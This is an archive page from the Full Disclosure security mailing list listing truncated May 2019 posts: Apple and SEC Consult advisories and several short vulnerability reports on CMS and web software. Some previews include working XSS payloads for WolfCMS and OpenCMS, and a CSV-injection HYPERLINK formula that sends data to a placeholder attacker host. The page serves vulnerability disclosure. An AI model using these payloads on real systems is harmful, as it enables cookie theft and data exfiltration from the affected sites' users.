Full Disclosure

Syndicate content
A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. More importantly, fresh vulnerabilities sometimes hit this list many hours or days before they pass through the Bugtraq moderation queue.
Updated: 12 min 18 sec ago

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update 2019-003 High Sierra, Security Update 2019-003 Sierra

13 May, 2019 - 13:19

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-2 macOS Mojave 10.14.5, Security Update
2019-003 High Sierra, Security Update 2019-003 Sierra

macOS Mojave 10.14.5, Security Update 2019-003 High Sierra,
Security Update 2019-003 Sierra are now available and
addresses the following:

Accessibility Framework
Available for: macOS Sierra 10.12.6, macOS Mojave 10.14.4
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with...

APPLE-SA-2019-5-13-1 iOS 12.3

13 May, 2019 - 13:19

Posted by Apple Product Security via Fulldisclosure on May 13

APPLE-SA-2019-5-13-1 iOS 12.3

iOS 12.3 is now available and addresses the following:

AppleFileConduit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)

Contacts
Available for: iPhone 5s and later, iPad...

[CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity Services

13 May, 2019 - 13:18

Posted by Joshua Mulliken on May 13

===================
Title: [CVE-2019-8978] Improper Authentication (CWE-287) in Ellucian Banner Web Tailor and Banner Enterprise Identity
Services
Author: Joshua Mulliken <
joshua () mulliken net

Thanks to: Carnegie Mellon University CERT Coordination Center
Date Found: Dec. 17, 2018
Vendor: Ellucian Company L.P.
Vendor Homepage:
https://www.ellucian.com
Products: Banner Web Tailor and Banner Enterprise Identity Services
Web Tailor Affected...

TOR browser / Firefox telemetry data

13 May, 2019 - 13:16

Posted by Bipin Gautam on May 13

POC:

tl;dr

run just Firefox browser / TOR and just nothing

and tcpdump the computing device / network

firewall BLOCK all IP/A names, gradually... that shows up in tcpdump
when you do not using firefox but it connects automatically (if you
block something firefox hops to something else, 3-5+ times )

QUICK FIX:

in address bar:

about:config

search for string:

org

com

mozilla

firefox

google

...?

to start with : almost all... the url...

SEC Consult SA-20190513-0 :: Cleartext message spoofing in supplementary Go Cryptography Libraries (@sec_consult)

13 May, 2019 - 08:27

Posted by SEC Consult Vulnerability Lab on May 13

Then the message was tampered by changing the value of the "Hash" Armor Header
from SHA-1 to SHA-512:

(content of hash_spoof.asc file):
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Message to be signed
-----BEGIN PGP SIGNATURE-----
iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N...

Cross Site Scripting | WolfCMS v0.8.3.1 and before

10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: WolfCMS v0.8.3.1 and before is vulnerable to cross site
scripting in User Add module for parameter Name.

Impacted URL is http://[your_webserver_ip]/wolfcms/?/admin/user/add

Payload used is "TestXSS><img src=x onmousover=alert(document.cookie)>

Further details: https://github.com/wolfcms/wolfcms/issues/683

Already requested for CVE, yet to receive it.

CSV Injection | Alkacon OpenCMS v10.5.4 and before

10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to CSV injection in New
User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used is
'=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe&quot;)'

Further details is available here
https://github.com/alkacon/opencms-core/issues/636

Already requested for...

Cross Site Scripting | Alkacon OpenCMS v10.5.4 and before

10 May, 2019 - 12:18

Posted by Pramod Rana on May 10

Description: OpenCMS v10.5.4 and before is vulnerable to cross site
scripting in New User module for parameter First Name and Last Name

Impacted URL is
http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp

Payload used in PoC is "TestXSS<img+src=x+onmouseover=alert(document.domain)

Further details is available here
https://github.com/alkacon/opencms-core/issues/635

Already requested for CVE, yet to receive...

Re: dotCMS v5.1.1 HTML Injection & XSS Vulnerability

10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-open-redirect-vulnerability/

dotCMS v5.1.1 suffers from an Open Redirect Vulnerability, in addition
to many other vulnerabilities that I am still verifying.

The following URL is a proof-of-concept that requires a user to be
logged in. Simply login to the demo before visiting the supplied POC.

Logging into the demo requires you to go to
https://demo.dotcms.com/dotAdmin <...

dotCMS v5.1.1 HTML Injection & XSS Vulnerability

10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Read full vulnerability report @
https://secureli.com/dotcms-v5-1-1-html-injection-xss-vulnerability/

dotCMS v5.1.1 suffers from an HTML injection and XSS vulnerability, in
addition to many other vulnerabilities that I am still verifying.

There's a screenshot available on my blog link above.

To reproduce this vulnerability, simply go to
https://dotcms.com/dotAdmin/ and login with their demo credentials
(username: admin () dotcms com...

dotCMS v5.1.1 Vulnerabilities

10 May, 2019 - 12:17

Posted by John Martinelli on May 10

Hello,

I identified several vulnerabilities in dotCMS v5.1.1 due to vulnerable
open source dependencies.

Full security write up:
http://secureli.com/dotcms-v5-1-1-vulnerable-open-source-dependencies/

The details:

/ROOT/html/js/scriptaculous/prototype.js

↳ prototypejs 1.5.0
prototypejs 1.5.0 has known vulnerabilities: severity: high; CVE:
CVE-2008-7220; http://www.cvedetails.com/cve/CVE-2008-7220/...

Enghouse Interactive´s CCSP 7.2.5 API XXE and SSRF,vulnerability via unauthenticated GET Request

10 May, 2019 - 12:14

Posted by David H on May 10

<!--
# Exploit Title: Enghouse Interactive´s CCSP 7.2.5 API XXE and SSRF
vulnerability via unauthenticated GET Request
# Date: 05-08-2018
# Exploit Author: David Herrero
# Vendor Homepage: https://www.enghouseinteractive.com
# Software Link:
https://www.enghouseinteractive.com/products/contact-center/contact-center-for-service/
# Version: Enghouse Interactive´s CCSP 7.2.5.102
# Tested on: Windows
# CVE : CVE-2018-8940
# Category:...

WordPress Plugin Form Maker 1.13.3 - SQL Injection

10 May, 2019 - 12:13

Posted by Daniele Scanu on May 10

# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection
# Date: 22-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://10web.io/plugins/
# Software Link: https://wordpress.org/plugins/form-maker/
# Version: 1.13.3
# Tested on: Wordpress 5.1

Description:
In the Form Maker plugin before 1.13.3 for WordPress, it's possible to
achieve SQL injection in the function get_labels_parameters in the file...

SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject

10 May, 2019 - 02:23

Posted by SEC Consult Vulnerability Lab on May 10

SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
=======================================================================
title: Unauthenticated SQL Injection vulnerability
product: OpenProject
vulnerable version: 5.0.0 - 8.3.1
fixed version: 8.3.2 & 9.0.0
CVE number: CVE-2019-11600
impact: Critical
homepage: https://www.openproject.org
found:...

SEC Consult SA-20190509-0 :: Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server / Ezio Server

9 May, 2019 - 05:55

Posted by SEC Consult Vulnerability Lab on May 09

SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Gemalto (Thales Group) DS3 Authentication Server / Ezio
Server
vulnerable version: Ezio DS3 server <v3.1.0
fixed version: Ezio DS3 server v3.1.0
CVE number: CVE-2019-9156, CVE-2019-9157, CVE-2019-9158...

Open source tool | Lets Map Your Network

7 May, 2019 - 12:31

Posted by Pramod Rana on May 07

Let’s Map Your Network (LMYN) aims to provide an easy to use interface
to security engineer and network administrator to have their network
in graphical form with zero manual error, where a node represents a
system and relationship between nodes represent the connection.

It is utmost important for any security engineer to understand their
network first before securing it and it becomes a daunting task to
have a ‘true’ understanding of a...

RCE in CGI Servlet – Apache Tomcat on Windows – CVE-2019-0232

4 May, 2019 - 14:22

Posted by Nightwatch Cybersecurity Research on May 04

[Original post:
https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/]

SUMMARY

Apache Tomcat has a vulnerability in the CGI Servlet which can be
exploited to achieve remote code execution (RCE). This is only
exploitable when running on Windows in a non-default configuration in
conjunction with batch files. The vendor released a fix in Tomcat
versions 7.0.94, 8.5.40...

[SYSS-2019-005]: ABUS Secvest - Proximity Key - Cryptographic Issues (CWE-310)

4 May, 2019 - 12:37

Posted by Matthias Deeg on May 04

Advisory ID: SYSS-2019-005
Product: ABUS Secvest (FUAA50000)
Manufacturer: ABUS
Affected Version(s): v3.01.01
Tested Version(s): v3.01.01
Vulnerability Type: Cryptographic Issues (CWE-310)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2019-03-15
Solution Date: -
Public Disclosure: 2019-05-02
CVE Reference: CVE-2019-9861
Authors of Advisory: Matthias Deeg, Gerhard Klostermeier (SySS GmbH)...

OneShield - Policy Solutions - Dragon Framework Persistent XSS in Framework Textboxes

4 May, 2019 - 12:33

Posted by ghost on May 04

# Exploit Title: Dragon - Persistent XSS in Framework Textboxes
# Date: 12/28/2018
# Vendor Homepage: https://oneshield.com
# Software Link: https://oneshield.com/business-solutions/oneshield-pc-solutions/oneshield-policy/
# Version: 5.0, 5.1
# Tested on: 5.1
# Exploit Author: Josh Sheppard
# Exploit Contact: ghost () a t undervurse dot_com
# Exploit Technique: Remote
# CVE: CVE-2019-11643
1. Description
A persistent cross site scripting...

OneShield - Policy Solutions - Dragon Framework Log Poisoning

4 May, 2019 - 12:33

Posted by ghost on May 04

# Exploit Title: Dragon - Log Poisoning
# Date: 12/28/2018
# Vendor Homepage: https://oneshield.com
# Software Link: https://oneshield.com/business-solutions/oneshield-pc-solutions/oneshield-policy/
# Version: 5.0, 5.1
# Tested on: 5.1
# Exploit Author: Josh Sheppard
# Exploit Contact: ghost () a t undervurse dot_com
# Exploit Technique: Remote
# CVE ID: CVE-2019-11642
1. Description
A log poisoning vulnerability has been discovered oin the...